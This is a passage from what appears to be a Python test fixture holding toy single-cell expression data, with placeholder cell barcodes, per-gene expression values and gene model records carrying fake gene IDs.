"FoobarAB5_BazMoo_8BAADDAAACABBCBD-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB1_BazMoo_6ABAAADABDACDDDA-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"F5 Expression": {
"name": "F5 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.58,
2.58,
2.0,
3.0,
2.58,
3.0,
1.58,
2.58,
2.0,
1.0,
1.0,
2.32,
1.58,
3.0,
2.0,
2.0,
1.0,
3.0,
1.58,
2.81,
2.0,
2.0,
1.58,
2.81,
1.58,
1.0,
2.58,
2.58,
2.81,
3.0,
2.0,
2.81,
3.0,
3.0,
2.0,
1.0,
3.0,
1.0,
2.32,
2.0,
2.58,
1.0,
2.81,
1.0,
2.81,
3.0,
1.58,
3.0,
2.32,
2.58,
3.0,
2.58,
2.58,
2.0,
2.0,
1.0,
2.58,
2.58,
2.81,
3.0,
2.0,
2.32,
2.81,
1.58,
1.0,
2.58,
2.58,
1.58,
3.0,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HLA-DQB1 Cells": {
"name": "HLA-DQB1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_2DABDACBCCCCADBC-1",
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB6_BazMoo_3CDCABAAADCACCBA-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB4_BazMoo_1DADCDAADADACBDD-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HLA-DQB1 Expression": {
"name": "HLA-DQB1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.0,
2.0,
1.0,
3.0,
3.0,
2.0,
2.58,
2.32,
2.81,
3.0,
2.81,
2.0,
3.0,
2.32,
2.81,
2.32,
2.81,
3.0,
2.0,
2.81,
2.58,
2.0,
2.81,
1.0,
2.58,
2.0,
2.32,
2.81,
3.0,
3.0,
2.58,
2.81,
2.32,
2.32,
2.0,
2.58,
1.58,
2.0,
2.58,
3.0,
2.32,
2.32,
2.0,
2.0,
2.0,
1.0,
2.81,
2.58,
2.81,
2.0,
1.58,
1.58,
1.0,
2.32,
2.58,
2.32,
2.81,
2.0,
3.0,
2.32,
1.0,
1.58,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HFE Cells": {
"name": "HFE Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB5_BazMoo_3DADDDCACDABCDCB-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB5_BazMoo_8BAADDAAACABBCBD-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB5_BazMoo_2DDBCCDBADBADCBC-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HFE Expression": {
"name": "HFE Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.58,
1.58,
3.0,
3.0,
2.0,
2.0,
2.32,
2.81,
2.81,
1.0,
2.58,
2.0,
1.0,
3.0,
2.0,
1.58,
2.32,
2.32,
3.0,
2.58,
2.81,
2.58,
1.0,
3.0,
2.81,
1.58,
2.58,
1.58,
3.0,
1.58,
3.0,
2.0,
1.0,
2.32,
1.58,
1.0,
1.58,
2.58,
2.58,
1.58,
1.58,
2.32,
1.0,
1.0,
2.0,
2.81,
2.32,
2.58,
2.32,
2.0,
2.81,
1.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
},
"gene_models": {
"TP53": {
"name": "TP53",
"searchable_name": "tp53",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE000",
},
"EGFR": {
"name": "EGFR",
"searchable_name": "egfr",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE001",
},
"TNF": {
"name": "TNF",
"searchable_name": "tnf",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE002",
},
"APOE": {
"name": "APOE",
"searchable_name": "apoe",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE003",
},
"VEGFA": {
"name": "VEGFA",
"searchable_name": "vegfa",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE004",
},
"IL6": {
"name": "IL6",
"searchable_name": "il6",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE005",
},
"MTHFR": {
"name": "MTHFR",
"searchable_name": "mthfr",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE006",
},
"TGFB1": {
"name": "TGFB1",
"searchable_name": "tgfb1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE007",
},
"ERBB2": {
"name": "ERBB2",
"searchable_name": "erbb2",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE008",
},
"ESR1": {
"name": "ESR1",
"searchable_name": "esr1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE009",
},
"ACE": {
"name": "ACE",
"searchable_name": "ace",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0010",
},
"IL10": {
"name": "IL10",
"searchable_name": "il10",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0011",
},
"HIF1A": {
"name": "HIF1A",
"searchable_name": "hif1a",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0012",
},
"APP": {
"name": "APP",
"searchable_name": "app",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0013",
},
"BRCA1": {
"name": "BRCA1",
"searchable_name": "brca1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0014",
},
"MMP9": {
"name": "MMP9",
"searchable_name": "mmp9",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0015",
},
"HLA-DRB1": {
"name": "HLA-DRB1",
"searchable_name": "hla-drb1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0016",
},
"ADIPOQ": {
"name": "ADIPOQ",
"searchable_name": "adipoq",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0017",
},
"ABCB1": {
"name": "ABCB1",
"searchable_name": "abcb1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0018",
},
"LOC110806262": {
"name": "LOC110806262",
"searchable_name": "loc110806262",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0019",
},
"NFKB1": {
"name": "NFKB1",
"searchable_name": "nfkb1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0020",
},
"AKT1": {
"name": "AKT1",
"searchable_name": "akt1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0021",
},
"CRP": {
"name": "CRP",
"searchable_name": "crp",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0022",
},
"AR": {
"name": "AR",
"searchable_name": "ar",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0023",
},
"BDNF": {
"name": "BDNF",
"searchable_name": "bdnf",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0024",
},
"BRAF": {
"name": "BRAF",
"searchable_name": "braf",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0025",
},
"STAT3": {
"name": "STAT3",
"searchable_name": "stat3",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0026",
},
"KRAS": {
"name": "KRAS",
"searchable_name": "kras",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0027",
},
"CDKN2A": {
"name": "CDKN2A",
"searchable_name": "cdkn2a",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0028",
},
"PTGS2": {
"name": "PTGS2",
"searchable_name": "ptgs2",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0029",
},
"IL1B": {
"name": "IL1B",
"searchable_name": "il1b",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0030",
},
"VDR": {
"name": "VDR",
"searchable_name": "vdr",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0031",
},
"NOS3": {
"name": "NOS3",
"searchable_name": "nos3",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0032",
},
"TLR4": {
"name": "TLR4",
"searchable_name": "tlr4",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0033",
},
"COMT": {
"name": "COMT",
"searchable_name": "comt",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0034",
},
"CTNNB1": {
"name": "CTNNB1",
"searchable_name": "ctnnb1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0035",
},
"PTEN": {
"name": "PTEN",
"searchable_name": "pten",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0036",
},
"CXCL8": {
"name": "CXCL8",
"searchable_name": "cxcl8",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0037",
},
"CFTR": {
"name": "CFTR",
"searchable_name": "cftr",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0038",
},
"PPARG": {
"name": "PPARG",
"searchable_name": "pparg",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0039",
},
"SLC6A4": {
"name": "SLC6A4",
"searchable_name": "slc6a4",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0040",
},
"HLA-B": {
"name": "HLA-B",
"searchable_name": "hla-b",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0041",
},
"TERT": {
"name": "TERT",
"searchable_name": "tert",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0042",
},
"SNCA": {
"name": "SNCA",
"searchable_name": "snca",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0043",
},
"CDH1": {
"name": "CDH1",
"searchable_name": "cdh1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0044",
},
"IGF1": {
"name": "IGF1",
"searchable_name": "igf1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0045",
},
"MYC": {
"name": "MYC",
"searchable_name": "myc",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0046",
},
"GSTM1": {
"name": "GSTM1",
"searchable_name": "gstm1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0047",
},
"BCL2": {
"name": "BCL2",
"searchable_name": "bcl2",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0048",
},
"MTOR": {
"name": "MTOR",
"searchable_name": "mtor",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0049",
},
"MAPT": {
"name": "MAPT",
"searchable_name": "mapt",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0050",
},
"LEP": {
"name": "LEP",
"searchable_name": "lep",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0051",
},
"CXCR4": {
"name": "CXCR4",
"searchable_name": "cxcr4",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0052",
},
"IFNG": {
"name": "IFNG",
"searchable_name": "ifng",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0053",
},
"CD4": {
"name": "CD4",
"searchable_name": "cd4",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0054",
},
"MDM2": {
"name": "MDM2",
"searchable_name": "mdm2",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0055",
},
"JAK2": {
"name": "JAK2",
"searchable_name": "jak2",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0056",
},
"BRCA2": {
"name": "BRCA2",
"searchable_name": "brca2",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0057",
},
"MMP2": {
"name": "MMP2",
"searchable_name": "mmp2",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0058",
},
"MAPK1": {
"name": "MAPK1",
"searchable_name": "mapk1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0059",
},
"SERPINE1": {
"name": "SERPINE1",
"searchable_name": "serpine1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0060",
},
"CCND1": {
"name": "CCND1",
"searchable_name": "ccnd1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0061",
},
"CCR5": {
"name": "CCR5",
"searchable_name": "ccr5",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0062",
},
"GSTT1": {
"name": "GSTT1",
"searchable_name": "gstt1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0063",
},
"CDKN1A": {
"name": "CDKN1A",
"searchable_name": "cdkn1a",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0064",
},
"PON1": {
"name": "PON1",
"searchable_name": "pon1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0065",
},
"CCL2": {
"name": "CCL2",
"searchable_name": "ccl2",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0066",
},
"BIRC5": {
"name": "BIRC5",
"searchable_name": "birc5",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0067",
},
"NPPB": {
"name": "NPPB",
"searchable_name": "nppb",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0068",
},
"F2": {
"name": "F2",
"searchable_name": "f2",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0069",
},
"GSTP1": {
"name": "GSTP1",
"searchable_name": "gstp1",
